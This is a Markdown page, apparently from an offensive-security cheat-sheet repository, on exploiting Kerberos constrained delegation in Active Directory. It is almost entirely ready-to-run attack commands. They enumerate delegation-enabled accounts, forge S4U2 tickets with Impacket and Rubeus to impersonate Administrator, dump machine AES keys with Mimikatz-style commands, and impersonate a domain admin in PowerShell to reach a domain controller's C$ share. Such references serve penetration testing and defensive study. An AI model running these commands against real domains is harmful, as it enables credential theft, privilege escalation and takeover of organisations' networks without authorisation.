kerberos-delegation-constrained.md (3184B)
1 --- 2 title: "Kerberos Delegation - Constrained Delegation" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/kerberos-delegation-constrained.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/kerberos-delegation-constrained.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Kerberos Delegation - Constrained Delegation 12 13 > Kerberos Constrained Delegation (KCD) is a security feature in Microsoft's Active Directory (AD) that allows a service to impersonate a user or another service in order to access resources on behalf of that user or service. 14 15 ## Identify a Constrained Delegation 16 17 * BloodHound: `MATCH p = (a)-[:AllowedToDelegate]->(c:Computer) RETURN p` 18 * PowerView: `Get-NetComputer -TrustedToAuth | select samaccountname,msds-allowedtodelegateto | ft` 19 * Native 20 21 ```powershell 22 Get-DomainComputer -TrustedToAuth | select -exp dnshostname 23 Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo 24 ``` 25 26 * bloodyAD: 27 28 ```ps1 29 bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=16777216))' --attr sAMAccountName,msds-allowedtodelegateto 30 ``` 31 32 ## Exploit the Constrained Delegation 33 34 * Impacket 35 36 ```ps1 37 getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10 38 ``` 39 40 * Rubeus: S4U2 attack (S4U2self + S4U2proxy) 41 42 ```ps1 43 # with a password 44 Rubeus.exe s4u /nowrap /msdsspn:"time/target.local" /altservice:cifs /impersonateuser:"administrator" /domain:"domain" /user:"user" /password:"password" 45 46 # with a NT hash 47 Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:time/srv01.domain.com /altservice:cifs /ptt 48 Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt 49 dir \\dc.domain.com\c$ 50 ``` 51 52 * Rubeus: use an existing ticket to perform a S4U2 attack to impersonate the "Administrator" 53 54 ```ps1 55 # Dump ticket 56 Rubeus.exe tgtdeleg /nowrap 57 Rubeus.exe triage 58 Rubeus.exe dump /luid:0x12d1f7 59 60 # Create a ticket 61 Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/srv.domain.local /ticket:doIFRjCCBUKgAwIBB...BTA== /ptt 62 ``` 63 64 * Rubeus : using aes256 keys 65 66 ```ps1 67 # Get aes256 keys of the machine account 68 privilege::debug 69 token::elevate 70 sekurlsa::ekeys 71 72 # Create a ticket 73 Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/srv.domain.local /user:win10x64$ /aes256:4b55f...fd82 /ptt 74 ``` 75 76 ## Impersonate a domain user on a resource 77 78 Require: 79 80 * SYSTEM level privileges on a machine configured with constrained delegation 81 82 ```ps1 83 PS> [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null 84 PS> $idToImpersonate = New-Object System.Security.Principal.WindowsIdentity @('administrator') 85 PS> $idToImpersonate.Impersonate() 86 PS> [System.Security.Principal.WindowsIdentity]::GetCurrent() | select name 87 PS> ls \\dc01.offense.local\c$ 88 ```